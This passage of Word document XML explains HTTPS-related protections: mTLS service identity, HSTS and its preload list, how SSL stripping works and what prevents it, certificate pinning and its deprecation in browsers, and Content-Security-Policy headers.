      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    ↓ mTLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF9491" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service B (cert: "service-b.example.internal")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47534C87" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Each service has its own identity (from its certificate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ABA651" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service B can enforce: "Only Service A and Service C are allowed to call me."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11185203" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No API keys or tokens needed — identity is cryptographic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0EF5BC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The service mesh (Istio/Linkerd) handles all of this transparently via sidecars.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6136C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08540642" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Zero-trust networking: never trust the network. Every connection is authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A80B45F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Encryption everywhere (east-west traffic, not just north-south).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694624C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Service-level authorization (not just network-level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158BE9E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="908"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Automatic key rotation (no shared secrets to manage/leak).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339848A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="1E1D79FE">
          <v:rect id="_x0000_i3983" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74275E44" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Security Headers — HTTPS-Dependent Protection Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25585ABB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 HSTS (HTTP Strict Transport Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D6D82" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> A user types example.com in the browser. The browser first tries HTTP, then gets redirected to HTTPS. During that initial HTTP request, an attacker can intercept and prevent the redirect (SSL stripping attack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377EE932" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How HSTS works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC4FC42" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server sends response header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E2255" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4347CCC1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Strict-Transport-Security: max-age=31536000; includeSubDomains; preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3486D298" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What this does:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3349D9D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Browser records: "For the next 31,536,000 seconds (1 year), NEVER connect to this domain over HTTP."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33364DDE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>All subsequent requests go directly to HTTPS (no HTTP attempt, no redirect needed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45560BCC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Applies to all subdomains (includeSubDomains).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110F7C43" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>preload: domain can be submitted to the HSTS Preload List (hardcoded in browsers — protects even the FIRST visit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1EC014" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The HSTS Preload List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BB7969" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>A list of domains hardcoded in Chrome, Firefox, Safari, Edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2D8930" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Over 200,000 domains on the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF4BA52" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Browsers ALWAYS use HTTPS for these domains — even on the very first visit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339CCB5C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Eliminates the bootstrapping problem (first visit is still vulnerable without preload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21324DA8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSL Stripping Attack (what HSTS prevents):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D9F994" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42486A8C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Without HSTS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C5725" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>User types: example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131821ED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Browser: GET http://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDA41C3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Attacker intercepts, serves fake page over HTTP (no redirect to HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1319A651" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>User thinks they're on the real site (no padlock, but many users don't notice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E280C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C233E28" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>With HSTS (after first visit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1470A8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>User types: example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3294B3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Browser: Knows HSTS is active → immediately uses https://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F95A8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Attacker cannot intercept (it's already encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9D26F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Certificate Pinning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ECE93C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> A compromised CA can issue a valid certificate for your domain to an attacker. The client would trust it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC8747" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate pinning (deprecated for browsers, still used in apps):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9E7886" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The application hardcodes which certificates (or public keys) it expects from the server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29827C55" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE87F94" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Expected public key hash: sha256/YLh1dUR9y6Kja30RrAn7JKnbQG/uEtLMkBgFF2Fuihg=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B731B2C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the server presents a certificate with a DIFFERENT public key → connection refused, even if the certificate is otherwise valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E6289E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why browsers deprecated pinning (HPKP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB13A1A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="911"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Misconfiguration = permanent lockout (pin the wrong key → your site is permanently unreachable for users who cached the pin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E9EEE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="911"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Hostile pinning: an attacker who briefly compromises your server can set pins that lock you out permanently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F40619" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="911"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Certificate Transparency (CT) is a better solution (detect rogue certs without the lockout risk).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269ACDAB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where pinning is still used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0D1C5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Mobile apps (hardcode the expected server certificate/public key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C3255" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>IoT devices (communicate only with known servers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3B076" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>High-security environments (banking apps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C56095" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Other Security Headers Related to HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916F311" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Security-Policy (CSP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6077C331" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D881DD8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Content-Security-Policy: upgrade-insecure-requests; default-src https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EDC8A7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
